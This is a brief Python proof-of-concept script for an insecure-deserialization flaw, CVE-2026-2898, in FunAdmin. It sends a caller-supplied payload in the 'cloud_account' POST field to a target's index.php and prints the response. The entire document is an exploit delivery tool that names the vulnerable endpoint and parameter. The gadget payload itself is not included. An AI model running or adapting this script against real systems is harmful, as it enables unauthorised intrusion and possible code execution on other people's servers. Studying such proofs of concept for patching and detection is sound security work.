import argparse
import requests

def send_payload(target, payload):
    url = f"{target}/index.php"
    
    data = {
        "cloud_account": payload
    }

    try:
        r = requests.post(url, data=data, timeout=5)
        print("[+] Response received")
        print(r.text[:500])
    except Exception as e:
        print(f"[!] Error: {e}")

def main():
    parser = argparse.ArgumentParser(
        description="CVE-2026-2898 FunAdmin Insecure Deserialization PoC"
    )
    parser.add_argument("--url", required=True)
    parser.add_argument("--payload", required=True)

    args = parser.parse_args()
    send_payload(args.url, args.payload)

if __name__ == "__main__":
    main()